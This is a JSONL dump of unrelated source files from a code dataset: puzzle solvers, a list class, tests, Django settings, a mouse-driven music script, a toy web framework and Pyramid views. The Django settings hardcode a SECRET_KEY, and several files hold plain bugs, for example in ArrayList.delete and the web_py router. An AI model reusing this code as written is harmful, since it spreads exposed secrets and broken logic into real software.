exist\")\n return False\n else:\n print(board) \n return True\n\n\n# In[90]:\n\n\nDeplacer(board, 0)\n\n\n# In[91]:\n\n\nsolveNQ()\n\n\n# In[92]:\n\n\ndef reine(n):\n def _reine(s,n,solutions): \n if len(s)==n: solutions.append(s)\n else:\n for i1 in set(range(1,n+1))-set(s): \n liste=[len(s)-j!=abs(i1-i) for j,i in enumerate(s)]\n if not(False in liste): _reine(s+[i1],n,solutions)\n solutions=[]\n _reine([],n,solutions)\n return solutions,('Nombre de solutions : %d' % len(solutions))\n\n\n# In[93]:\n\n\nreine(4)\n\n\n# In[94]:\n\n\nreine(6)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Problème Echiquier.py","file_name":"Problème Echiquier.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"300812840","text":"class ArrayList:\r\n\tdef __init__(self, initialCapacity=10):\r\n\t\tself.capacity = initialCapacity\r\n\t\tself.data = [None] * self.capacity\r\n\t\tself.length = 0\r\n\r\n\tdef __str__(self):\r\n\t\toutput = \"[\"\r\n\t\tif(self.length == 0):\r\n\t\t\toutput += \"]\"\r\n\t\telif(self.length == 1):\r\n\t\t\toutput += \"{0}]\".format(self.data[0])\r\n\t\telse:\r\n\t\t\tfor i in range(self.length - 1):\r\n\t\t\t\toutput += \"{0}, \".format(self.data[i])\r\n\t\t\t\r\n\t\t\toutput += \"{0}]\".format(self.data[self.length - 1])\r\n\r\n\t\treturn output\r\n\r\n\tdef access(self, index):\r\n\t\tif(index >= self.length):\r\n\t\t\traise self.InvalidIndexError(\"No element at index {0} in list of length {1}\".format(index, self.length))\r\n\t\telif(index < 0):\r\n\t\t\traise self.InvalidIndexError(\"Negative index of {0}\".format(index))\r\n\t\telse:\r\n\t\t\treturn self.data[index]\r\n\r\n\tdef insert(self, data):\r\n\t\tif(self.length >= self.capacity):\r\n\t\t\tself.capacity *= 2\r\n\t\t\tnew = [None] * self.capacity\r\n\t\t\tfor i in range(self.length):\r\n\t\t\t\tnew[i] = self.data[i]\r\n\t\t\tself.data = new\r\n\r\n\t\tself.data[self.length] = data\r\n\t\tself.length += 1\r\n\r\n\tdef search(self, data):\r\n\t\tfor i in range(self.length):\r\n\t\t\tif(data == self.data[i]):\r\n\t\t\t\treturn i\r\n\t\treturn -1\r\n\r\n\tdef delete(self, index=None):\r\n\t\tif(index == None):\r\n\t\t\tself.length -= 1\r\n\t\t\tif(self.length <= self.capacity / 2):\r\n\t\t\t\tself.capacity = self.capacity // 2\r\n\t\t\t\tnew = [None] * self.capacity\r\n\t\t\t\tfor i in range(self.length):\r\n\t\t\t\t\tnew[i] = self.data[i]\r\n\t\t\t\tself.data = new\r\n\t\telif(index >= self.length):\r\n\t\t\traise self.InvalidIndexError(\"No element at index {0} in list of length {1}\".format(index, self.length))\r\n\t\telif(index < 0):\r\n\t\t\traise self.InvalidIndexError(\"Negative index of {0}\".format(index))\r\n\t\telse:\r\n\t\t\tfor i in range(index, self.length):\r\n\t\t\t\tself.data[i] = self.data[i + 1]\r\n\t\t\t\tself.length -= 1\r\n\t\t\tif(self.length <= self.capacity / 2):\r\n\t\t\t\tself.capacity = self.capacity // 2\r\n\t\t\t\tnew = [None] * self.capacity\r\n\t\t\t\tfor i in range(self.length):\r\n\t\t\t\t\tnew[i] = self.data[i]\r\n\t\t\t\tself.data = new\r\n\r\n\tclass InvalidIndexError(Exception):\r\n\t\tdef __init__(self, msg):\r\n\t\t\tself.msg = msg\r\n\t\tdef __str__(self):\r\n\t\t\treturn self.msg\r\n\r\nif __name__ == \"__main__\":\r\n\tmyList = ArrayList()","sub_path":"data_structures/arraylist.py","file_name":"arraylist.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401028172","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# © 2017-2019, ETH Zurich, Institut für Theoretische Physik\n# Author: Dominik Gresch \n\nimport tempfile\n\nimport pytest\nimport numpy as np\n\n\n@pytest.mark.parametrize(\n 'bands_params', [{\n 'kpoints': [[0., 0., 0.]],\n 'eigenvals': [[0, 1., 2.]]\n }]\n)\ndef test_write_read(configure, bands_params): # pylint: disable=unused-argument\n from aiida.plugins import DataFactory\n from aiida_bands_inspect.io import read_bands, write_bands\n BandsData = DataFactory('array.bands')\n bands = BandsData()\n bands.set_kpoints(bands_params['kpoints'])\n bands.set_bands(bands_params['eigenvals'])\n with tempfile.NamedTemporaryFile() as tmpf:\n write_bands(bands, tmpf.name)\n res = read_bands(tmpf.name)\n assert np.allclose(res.get_kpoints(), bands.get_kpoints())\n assert np.allclose(res.get_bands(), bands.get_bands())\n\n\ndef test_read(configure, sample): # pylint: disable=unused-argument\n from aiida_bands_inspect.io import read_bands\n res = read_bands(sample('bands_mesh.hdf5'))\n assert np.allclose(res.get_kpoints(), [[0., 0., 0.], [0., 0., 0.5]])\n assert np.allclose(res.get_bands(), [[1, 2], [3, 4]])\n","sub_path":"tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"62654006","text":"import os\n\nDIRNAME = os.path.abspath(os.path.dirname(__file__))\n\nDEBUG = TEMPLATE_DEBUG = False\n\nADMINS = (\n ('Den Schigrov', 'den.schigrov@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'poputchik',\n 'USER': 'poputchik',\n }\n}\n\nTIME_ZONE = 'America/Toronto'\n\nLANGUAGE_CODE = 'en-us'\n\nMEDIA_ROOT = os.path.join(DIRNAME, 'media')\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = DIRNAME + '/static'\nSTATIC_URL = '/static/'\n\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\nSTATICFILES_DIRS = (\n DIRNAME + '/staticfiles',\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'tw425ehotwktw4io4209yot42142yjtlkegwknlqr3kl325gwrewklt24'\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'content.context_processors.site_elements',\n)\n\nROOT_URLCONF = 'img.urls'\n\nTEMPLATE_DIRS = (\n DIRNAME + '/templates',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'content',\n 'contact',\n 'account',\n 'imagekit',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\nSTATIC_SERVE_ROOT = None\n\ntry:\n from settings_local import *\nexcept:\n pass\n\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"557718618","text":"from scamp import *\nfrom pynput import mouse\n\nfrom scamp import Session, Ensemble\n\ndef construct_ensemble():\n global piano_clef,piano_bass, flute, strings, session\n ensemble = Ensemble(default_soundfont=\"/usr/share/sounds/sf2/FluidR3_GM.sf2\")\n\n #ensemble.print_default_soundfont_presets()\n\n piano_clef = ensemble.new_part(\"harp\")\n piano_bass = ensemble.new_part(\"violoncello\")\n return [piano_clef,piano_bass,ensemble.new_part(\"piano\"),ensemble.new_part(\"piano\"),ensemble.new_part(\"harp\"),ensemble.new_part(\"flute\")]\n #strings = ensemble.new_part(\"strings\", (0, 40))\n\n\n\n\ndef aT(u,a):\n if u in [1,5,7,11]:\n return lambda x : (u*x+a)%12\n\ndef mul(U,V):\n u,a = U\n x,y = V\n return ((u*x)%12,(u*y+a)%12)\n\ndef iterMul(x,k):\n if k == 1:\n return x\n else:\n return mul(iterMul(x,k-1),x)\n\ndef orderMul(x):\n y = x\n o = 1\n while y!=(1,0):\n o+=1\n y = mul(y,x)\n return o\n \n\n\ndef on_move(x, y):\n global currentCounter\n print('Pointer moved to {0}'.format(\n (x, y)))\n currentCounter += y-x\n\ndef on_click(x, y, button, pressed):\n global countClick\n print('{0} at {1}'.format(\n 'Pressed' if pressed else 'Released',\n (x, y)))\n if pressed:\n countClick += 1\n #print(countClick)\n \ndef on_scroll(x, y, dx, dy):\n global currentCounter, startPitch, oneOctave,twoLoops, instrument\n print('Scrolled {0} at {1}'.format(\n 'down' if dy < 0 else 'up',\n (x, y)))\n if dy>=0:\n currentCounter += 1\n else:\n currentCounter -= 1\n\n# Collect events until released\n#with mouse.Listener(\n# on_move=on_move,\n# on_click=on_click,\n# on_scroll=on_scroll) as listener:\n# listener.join()\n\n# ...or, in a non-blocking fashion:\nlistener = mouse.Listener(on_move=on_move,on_click=on_click,on_scroll=on_scroll)\n\n\ncountClick = 0 \ncurrentCounter = 0\noneOctave = list(range(60,72))\nbassOctave = list(range(60-1*12,60-0*12))\nstartPitchClef = 0 \nstartPitchBass = 1\naffineGroup = [aT(u,a) for u in [1,5,7,11] for a in range(12)] \naffineGroupIndex = [(u,a) for u in [1,5,7,11] for a in range(12)] \n\naffineGroupByOrder = [ (orderMul(x),x) for x in affineGroupIndex]\nprint(affineGroupByOrder)\ntwoLoops = [x for o,x in affineGroupByOrder if o==2]\nthreeLoops = [x for o,x in affineGroupByOrder if o==3]\nfourLoops = [x for o,x in affineGroupByOrder if o==4]\nprint(len(twoLoops))\nprint(len(fourLoops))\ncountBass = 0\n\n#s = Session(default_soundfont_preset=\"path/to/soundfont.sf2\")\n#s = Session(default_soundfont=\"/usr/share/sounds/sf2/FluidR3_GM.sf2\",tempo=130)\ns = Session(tempo=120)\n\ntracks = construct_ensemble()\n#s.print_default_soundfont_presets()\n\n#print(dir(s))\n#s.print_available_midi_output_devices()\n\n#drums = s.new_part(\"Concert Bass Drum\")\n\n\ndef play_notes_for_first(numNotes,duration):\n global countBass, countClick, tracks, currentCounter, startPitchClef, oneOctave,twoLoops, instrument, affineGroupIndex, bass\n print(\"playing first\" ,oneOctave[startPitchClef]) \n \n for k in range(numNotes):\n tracks[(countClick%len(tracks)+countClick%2)%len(tracks)].play_note(oneOctave[startPitchClef], 0.7,duration)\n #tracks[1].play_note(bassOctave[startPitch], 1, 1.0)\n startPitchClef = aT(*affineGroupIndex[currentCounter%len(affineGroupIndex)])(startPitchClef) \n \n\ndef play_notes_for_second(numNotes,duration):\n global countBass,countClick, tracks, currentCounterBass, startPitchBass, oneOctave,twoLoops, instrument, affineGroupIndex, bass\n print(\"playing second\" ,bassOctave[startPitchBass]) \n \n #tracks[0].play_note(oneOctave[startPitch], 0.5, 0.5)\n for k in range(numNotes):\n tracks[(countClick%len(tracks)+(countClick+1)%2)%len(tracks)].play_note(bassOctave[startPitchBass], 0.7, duration)\n countBass+=1\n startPitchBass = aT(*affineGroupIndex[currentCounter%len(affineGroupIndex)])(startPitchBass) \n \n \nif __name__==\"__main__\":\n listener.start()\n while True:\n if countBass%8 in [0,3,6]:\n s.fork(play_notes_for_first,(4,0.5))\n s.fork(play_notes_for_second,(1,2.0))\n else:\n s.fork(play_notes_for_first,(2,0.5))\n s.fork(play_notes_for_second,(1,1.0))\n s.wait_for_children_to_finish()","sub_path":"scampUI.py","file_name":"scampUI.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261865468","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\", encoding='UTF8')\n\nT = 10\n\nfor test_case in range(1, T + 1):\n cnt = 0\n tc = int(input())\n s = input()\n _input = input()\n for i in range(len(_input)):\n if s[0] == _input[i]:\n if s == _input[i:(i+len(s))]:\n cnt += 1\n print(\"#\" + str(test_case) + \" \", end='')\n print(cnt)\n # print(_input.count(s))\n","sub_path":"samsung/10_1213.py","file_name":"10_1213.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"488820901","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"web_py.py\"\"\"\nimport inspect\nimport re\nimport threading\n\nctx = threading.local()\n\nclass application:\n \"\"\"my simple web framework\"\"\"\n\n headers = []\n\n def __init__(self, urls=()):\n _urls = []\n for pattern, klass, pstr in urls:\n if inspect.isclass(klass):\n obj = klass()\n elif inspect.ismodule(klass):\n obj = klass\n else:\n raise ValueError(repr(klass) + ' must be class or module')\n refunc = re.compile('^' + pattern + '$')\n _urls.append(refunc, obj)\n self._urls = tuple(_urls)\n self._status = '200 OK'\n\n def __call__(self, environ, start_response):\n del self.headers[:] # 在每次作出响应前,清空上一次的headers\n result = self._delegate(environ)\n start_response(self._status, self.headers)\n\n # 将返回值result(字符串 或者 字符串列表)转换为迭代对象\n if isinstance(result, basestring):\n return iter([result])\n else:\n return iter(result)\n\n def _delegate(self, environ):\n path = environ['PATH_INFO']\n method = environ['REQUEST_METHOD'].upper() # 方法名大写(如GET、POST)\n\n for refunc, obj in self._urls:\n m = re.match(path)\n if m:\n kwds = self._valid(m.groups(), )\n funcname = \"%s_%s\" % (kwds.get('action', 'index').lower(), method)\n if hasattr(obj, funcname):\n return obj.funcname(**kwds)\n else:\n return self._notfound(\"Not Action Found\\n\")\n\n return self._notfound(\"Not Match Found\\n\")\n\n def _notfound(self, msg):\n status = '404 Not Found'\n return self._bad_status(status, msg)\n\n def _bad_status(self, status, msg):\n self.status = status\n self.header('Content-type', 'text/html')\n return msg\n\n @classmethod\n def del_header(cls):\n del self.headers[:]\n\n @classmethod\n def header(cls, name, value):\n cls.headers.append((name, value))\n\nheader = application.header","sub_path":"web_py.py","file_name":"web_py.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"389535644","text":"def recAncestors(p1):\r\n #if the person exists and they have parents\r\n #call recursive on their parents\r\n #if they dont have parents, just return person's name\r\n try:\r\n person = family[p1];\r\n parents = list(person[\"parent\"]);\r\n except KeyError as e:\r\n return p1;\r\n fullstring = p1 + \" \" + recAncestors(parents[0]) + \" \" + recAncestors(parents[1]);\r\n return fullstring;\r\n\r\n#handleE\r\n#adds people to family and define parent child relationships\r\n#pXDict is a reference to dictionary of that person\r\ndef handleE2(p1,p2):\r\n p1Dict = family.setdefault(p1,{});\r\n p2Dict = family.setdefault(p2,{});\r\n\r\n p1Spouses = p1Dict.setdefault(\"spouse\",set());\r\n p1Spouses.add(p2);\r\n\r\n p2Spouses = p2Dict.setdefault(\"spouse\",set());\r\n p2Spouses.add(p1);\r\n return 1;\r\n \r\ndef handleE3(p1,p2,p3):\r\n p1Dict = family.setdefault(p1,{});\r\n p2Dict = family.setdefault(p2,{});\r\n p3Dict = family.setdefault(p3,{});\r\n\r\n p1Spouses = p1Dict.setdefault(\"spouse\",set());\r\n p1Spouses.add(p2);\r\n p1Children = p1Dict.setdefault(\"children\",set());\r\n p1Children.add(p3);\r\n \r\n p2Spouses = p2Dict.setdefault(\"spouse\",set());\r\n p2Spouses.add(p1);\r\n p2Children = p2Dict.setdefault(\"children\",set());\r\n p2Children.add(p3);\r\n \r\n p3Parents = p3Dict.setdefault(\"parent\",set());\r\n p3Parents.add(p1);\r\n p3Parents.add(p2);\r\n return 1;\r\n\r\ndef handleW(s1,p1):\r\n #If person exists ret = personDict\r\n #otherwise return empty list\r\n try:\r\n ret = family[p1];\r\n except KeyError as e:\r\n return [];\r\n \r\n #case spouse\r\n if(s1 == \"spouse\"):\r\n try:\r\n ret = ret[\"spouse\"];\r\n except KeyError as e:\r\n return [];\r\n #case parent\r\n elif(s1 == \"parent\"):\r\n try:\r\n ret = ret[\"parent\"];\r\n except KeyError as e:\r\n return[];\r\n #case sibling\r\n elif(s1 == \"sibling\"):\r\n try:\r\n #list of strings which contain parents names\r\n parents = list(ret[\"parent\"]);\r\n\r\n #lookup parent in family dictionary\r\n #then find their children set\r\n parent1 = family[parents[0]];\r\n parent1children = parent1[\"children\"];\r\n\r\n parent2 = family[parents[1]];\r\n parent2children = parent2[\"children\"];\r\n except KeyError as e:\r\n return[];\r\n\r\n #take the intersection of the two sets\r\n ret = parent1children & parent2children;\r\n ret.remove(p1);\r\n #case half-sibling\r\n elif(s1 == \"half-sibling\"):\r\n try:\r\n #same logic as sibling case\r\n parents = list(ret[\"parent\"]);\r\n \r\n parent1 = family[parents[0]];\r\n parent1children = parent1[\"children\"];\r\n\r\n parent2 = family[parents[1]];\r\n parent2children = parent2[\"children\"];\r\n except KeyError as e:\r\n return[];\r\n\r\n #take the symmetric of the two sets\r\n ret = parent1children ^ parent2children;\r\n #case ancestor\r\n elif(s1 == \"ancestor\"):\r\n fullstring = recAncestors(p1);\r\n ret = set(fullstring.split());\r\n #ret should never be empty, if recAncestor is called on:\r\n #a person who doesnt exist or who doesnt have parents\r\n #these both return at least p1 as the name\r\n ret.remove(p1);\r\n elif(s1 == \"cousin\"):\r\n #declair empty set\r\n ret = set();\r\n #get p1's ancestors, if there are none then they cannot have cousins\r\n p1Ancestor = handleW(\"ancestor\",p1);\r\n if(not p1Ancestor):\r\n return [];\r\n potentialRelatives = family.keys();\r\n for name in potentialRelatives:\r\n relAncestor = handleW(\"ancestor\",name);\r\n #if set not empty and if there is an overlap\r\n if(p1Ancestor & relAncestor):\r\n ret.add(name);\r\n ret.remove(p1); \r\n #base case\r\n else:\r\n return [];\r\n return ret; \r\ndef handleX(s1,s2,s3):\r\n tmp = handleW(s2,s3);\r\n if s1 in tmp:\r\n return True;\r\n else:\r\n return False;\r\ndef handleR(s1,s2):\r\n if(handleX(s1,\"spouse\",s2) == True):\r\n print(\"Spouse\");\r\n elif(handleX(s1,\"parent\",s2) == True):\r\n print(\"Parent\");\r\n elif(handleX(s1,\"sibling\",s2) == True):\r\n print(\"Sibling\");\r\n elif(handleX(s1,\"half-sibling\",s2) == True):\r\n print(\"half-Sibling\");\r\n elif(handleX(s1,\"ancestor\",s2) == True):\r\n print(\"Ancestor\");\r\n elif(handleX(s1,\"cousin\",s2) == True):\r\n print(\"Cousin\");\r\n else:\r\n print(\"Unrelated\");\r\n print(\"\");\r\n return 1;\r\n\r\n#handleP\r\n#a debugging tool that prints out contents of each member of the family when called\r\ndef handleP():\r\n for v in family:\r\n print(15*'*');\r\n print(v);\r\n print(family[v]);\r\n print(15*'*');\r\n \r\n print(sorted(family.keys()));\r\n print('handledP');\r\n\r\n#create dictionary datastructure\r\nfamily = {}\r\n#run until EOF\r\nwhile(1):\r\n #If it is at EOF, exit main loop\r\n #otherwise continue to process\r\n try:\r\n s = input();\r\n except EOFError as e:\r\n break;\r\n \r\n #tokenize the string\r\n tokenList = s.split();\r\n\r\n #determine query case\r\n if(tokenList[0] == 'E' and len(tokenList) == 4):\r\n handleE3(tokenList[1],tokenList[2],tokenList[3]);\r\n\r\n if(tokenList[0] == 'E' and len(tokenList) == 3):\r\n handleE2(tokenList[1],tokenList[2]);\r\n\r\n if(tokenList[0] == 'R'):\r\n print(s);\r\n handleR(tokenList[1],tokenList[2]);\r\n\r\n if(tokenList[0] == 'X'):\r\n print(s);\r\n if(handleX(tokenList[1],tokenList[2],tokenList[3])):\r\n print(\"Yes\\n\");\r\n else:\r\n print(\"No\\n\");\r\n \r\n\r\n if(tokenList[0] == 'W'):\r\n print('W '+ tokenList[1] +' '+tokenList[2]);\r\n val = handleW(tokenList[1],tokenList[2]);\r\n val = sorted(val);\r\n for i in val:\r\n print(i);\r\n print('');\r\n\r\n #if(tokenList[0] == 'P'):\r\n # print('P');\r\n # handleP();\r\n","sub_path":"Calabrese.py","file_name":"Calabrese.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"616390505","text":"import io\nimport time\nfrom concurrent.futures import ProcessPoolExecutor\nfrom pathlib import Path\n\nimport numpy as np\nimport requests\nfrom PIL import Image\n\nIMAGE_FOLDER = Path(\".\").absolute() / \"demo\"\n\n\ndef download_image(img_url: str, save_loc: Path) -> np.ndarray:\n img_url = img_url.replace(\"\\n\", \"\")\n img_bytes = requests.get(img_url).content\n img_name = img_url.split(\"/\")[-1].replace(\"\\n\", \"\")\n\n save_loc.mkdir(parents=True, exist_ok=True)\n\n with open(save_loc / img_name, \"wb\") as img_file:\n img_file.write(img_bytes)\n\n return np.array(Image.open(io.BytesIO(img_bytes)))\n\n\nif __name__ == \"__main__\":\n start = time.perf_counter()\n\n with open(IMAGE_FOLDER / \"demo_urls.txt\", \"r\") as f:\n img_urls = [f.readline() for _ in range(10)]\n\n with ProcessPoolExecutor() as executor:\n for url in img_urls:\n executor.submit(download_image, url, IMAGE_FOLDER)\n\n finish = time.perf_counter()\n print(f\"Finished in {round(finish-start, 2)} seconds\")\n","sub_path":"python3/19_Concurrency_and_Parallel_Programming/01_MultiThreading/i_concurrent_futures/c_process_pool_usage.py","file_name":"c_process_pool_usage.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"348054008","text":"from pyramid.view import view_config\nfrom ..models.main_models import *\n\nfrom greggo.storage.redis.voters_age_storage import PollVotersAgeStorage\nfrom greggo.storage.redis.voters_gender_storage import PollVotersGenderStorage\nfrom greggo.config import REDIS_SERVER\n\nfrom ..utils.scraper_util import get_page_thumb_title_desc, url_exists, get_first_url\nfrom ..utils.compile_util import compile_poll_details, compile_opinion_details\nfrom pyramid.response import Response\nimport transaction\nfrom pyramid.httpexceptions import HTTPFound\nimport uuid\nfrom sqlalchemy import or_, and_\nfrom ..services.activity_service import get_source\nfrom ..services.follow_service import FollowService\n\n\n@view_config(route_name='view_profile', renderer='../templates/profile_page_mobile.jinja2')\ndef view_profile(request):\n from repoll.services.follow_service import FollowService\n user_id = request.matchdict.get('user_id', -1)\n #user_slug = request.matchdict.get('slug', None)\n user_is_self = False\n polls = []\n is_following = False\n\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n polls = reversed(user.polls[0:30])\n\n if request.user: \n user_is_self = request.user.id == int(user_id)\n return {'user': user, 'polls': polls, 'user_is_self': user_is_self}\n\n\n@view_config(route_name='get_user_details', renderer='json')\ndef get_user_details(request):\n user_id = request.matchdict.get('user_id', -1)\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n user_dict = {}\n user_dict['userName'] = user.full_name\n user_dict['username'] = user.username\n user_dict['userPic'] = user.profile_picture\n user_dict['num_of_followed'] = user.num_of_followed\n user_dict['num_of_followers'] = user.num_of_followers\n if request.user:\n user_followers = FollowService.get_followers(request, user)\n user_dict['is_following'] = request.user.id in user_followers\n #if user is not logged in\n else:\n user_dict['is_following'] = False\n user_dict['slug'] = user.slug\n user_dict['id'] = user.id\n user_dict['userLoggedIn'] = True if request.user else False\n return user_dict\n\n\n@view_config(route_name='get_user_polls', renderer='json')\ndef get_user_polls(request):\n user_id = request.matchdict.get('user_id', None)\n dictt = []\n if user_id:\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n for poll in user.polls:\n poll_dictt = compile_poll_details(request, poll, request.user)\n dictt.append(poll_dictt)\n return {'activities': {'polls': dictt}}\n\n\n@view_config(route_name='get_comment_and_replies', renderer='json')\ndef get_comment_and_replies(request):\n user_id = request.matchdict.get('user_id', None)\n dictt = {'c_and_s': []}\n if user_id:\n activities = request.dbsession.query(Activity).filter(Activity.user_id == user_id, (Activity.activity_type == 'comment') | (Activity.activity_type == 'reply'))\n for activity in activities:\n source = get_source(request, activity)\n source_id = activity.source_id\n activity = request.dbsession.query(source).filter(source.id == source_id).first()\n object_is_poll = None\n object_is_opinion = None\n if source == Comment:\n try:\n object_is_poll = activity.poll != None\n except Exception as e:\n print(e)\n\n try:\n object_is_opinion = activity.opinion != None\n\n except Exception as e:\n print(e)\n\n comment_dictt = {\n 'type': 'comment',\n 'comment_id': activity.id,\n 'commenterInitals': activity.added_by.initials,\n 'commenter': activity.added_by.full_name,\n 'comment': activity.comment,\n 'option_chosen': activity.option.title,\n 'poll': activity.poll.question if object_is_poll else None, # remember to add object\n 'opinion': activity.opinion.opinion if object_is_opinion else None\n }\n if object_is_poll:\n comment_dictt['poll'] = {\n\t\t\t\t\t 'userName': activity.poll.added_by.full_name, \n\t\t\t\t\t 'question': activity.poll.question,\n\t\t\t\t\t 'slug': activity.poll.slug, \n\t\t\t\t\t\n\t\t\t\t }\n if object_is_opinion:\n comment_dictt['opinion'] = {\n 'userName': activity.opinion.added_by.full_name,\n 'opinion': activity.opinion.opinion,\n }\n dictt['c_and_s'].append(comment_dictt)\n\n return dictt\n\n\n@view_config(route_name='get_likes_and_shares', renderer='json')\ndef get_likes_and_shares(request):\n user_id = request.matchdict.get('user_id', None)\n dictt = {'l_and_s': []}\n if user_id:\n activities = request.dbsession.query(Activity).filter(Activity.user_id == user_id, (Activity.activity_type == 'like') | (Activity.activity_type == 'share'))\n\n for activity in activities:\n source = get_source(request, activity)\n source_id = activity.source_id\n activity = request.dbsession.query(source).filter(source.id == source_id).first()\n object_is_poll = None\n object_is_opinion = None\n object_is_comment = None\n object_is_reply = None\n\n if source == Share:\n try:\n object_is_poll = activity.poll != None\n except Exception as e:\n print(e)\n\n try:\n object_is_opinion = activity.opinion != None\n\n except Exception as e:\n print(e)\n\n try:\n object_is_comment = activity.comment != None\n except Exception as e:\n print(e)\n\n try: \n object_is_reply = activity.reply != None\n except Exception as e: \n print(e)\n \n if object_is_poll: \n poll_dictt = compile_poll_details(request, activity, request.user)\n dictt['l_and_s'].append(poll_dictt)\n\n\n if source == Like: \n try:\n object_is_poll = activity.poll != None\n except Exception as e:\n print(e)\n\n try:\n object_is_opinion = activity.opinion != None\n\n except Exception as e:\n print(e)\n\n try:\n object_is_comment = activity.comment != None\n except Exception as e:\n print(e)\n\n try: \n object_is_reply = activity.reply != None\n except Exception as e: \n print(e) \n\n\n if object_is_poll:\n activity = activity.poll \n poll_dictt = compile_poll_details(request, activity, request.user)\n dictt['l_and_s'].append(poll_dictt) \n\n return dictt\n \n\n\n@view_config(route_name='get_posts', renderer='json')\ndef get_posts(request):\n dictt = {'opinions': []}\n user_id = request.matchdict.get('user_id', None)\n if user_id:\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n for opinion in user.opinions:\n op_dictt = compile_opinion_details(request, opinion, request.user)\n dictt['opinions'].append(op_dictt)\n return dictt\n\n\n@view_config(route_name='get_slug', renderer='json')\ndef get_slug(request):\n user_id = request.matchdict.get('user_id', None)\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n user_slug = user.slug\n return {'userSlug': user_slug}","sub_path":"views/profile_actions.py","file_name":"profile_actions.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"391086678","text":"\"\"\"\n@copyright: (c)Copyright 2014, Intel Corporation All Rights Reserved.\nThe source code contained or described here in and all documents related to the source code (\"Material\") are owned by\nIntel Corporation or its suppliers or licensors. Title to the Material remains with Intel Corporation or its suppliers\nand licensors. The Material contains trade secrets and proprietary and confidential information of Intel or its\nsuppliers and licensors.\n\nThe Material is protected by worldwide copyright and trade secret laws and treaty provisions. No part of the Material\nmay be used, copied, reproduced, modified, published, uploaded, posted, transmitted, distributed, or disclosed\nin any way without Intel's prior express written permission.\n\nNo license under any patent, copyright, trade secret or other intellectual property right is granted to or conferred\nupon you by disclosure or delivery of the Materials, either expressly, by implication, inducement, estoppel or\notherwise. Any license under such intellectual property rights must be express and approved by Intel in writing.\n\n:organization: INTEL MCG PSI\n:summary: unit test\n:since 10/09/2014\n:author: jfranchx\n\"\"\"\nimport mock\n\nfrom unit_test.UtTestStep.UTestTestStepBase import UTestTestStepBase\nfrom Core.TestStep.TestStepContext import TestStepContext\nfrom acs_test_scripts.TestStep.Device.Wireless.Common.IPMgmt.GetMacAddress import GetMacAddress\nfrom UtilitiesFWK.Utilities import TestConst\n\n\nclass GetMacAddressTest(UTestTestStepBase):\n \"\"\"\n GetMacAddress test cases\n \"\"\"\n\n WIFI_MAC_ADDRESS = \"AA:BB:CC:DD:EE:FF\"\n\n def setUp(self):\n \"\"\"\n Set up\n \"\"\"\n UTestTestStepBase.setUp(self)\n self._dest_var = \"mac_address\"\n self._context = TestStepContext()\n\n def test_get_mac_address_ok(self):\n sut = self._create_sut({\"INTERFACE\": \"wlan0\"})\n\n value_expected = self.WIFI_MAC_ADDRESS\n self._method.return_value = self.WIFI_MAC_ADDRESS\n\n sut.run(self._context)\n value_got = self._context.get_info(self._dest_var)\n 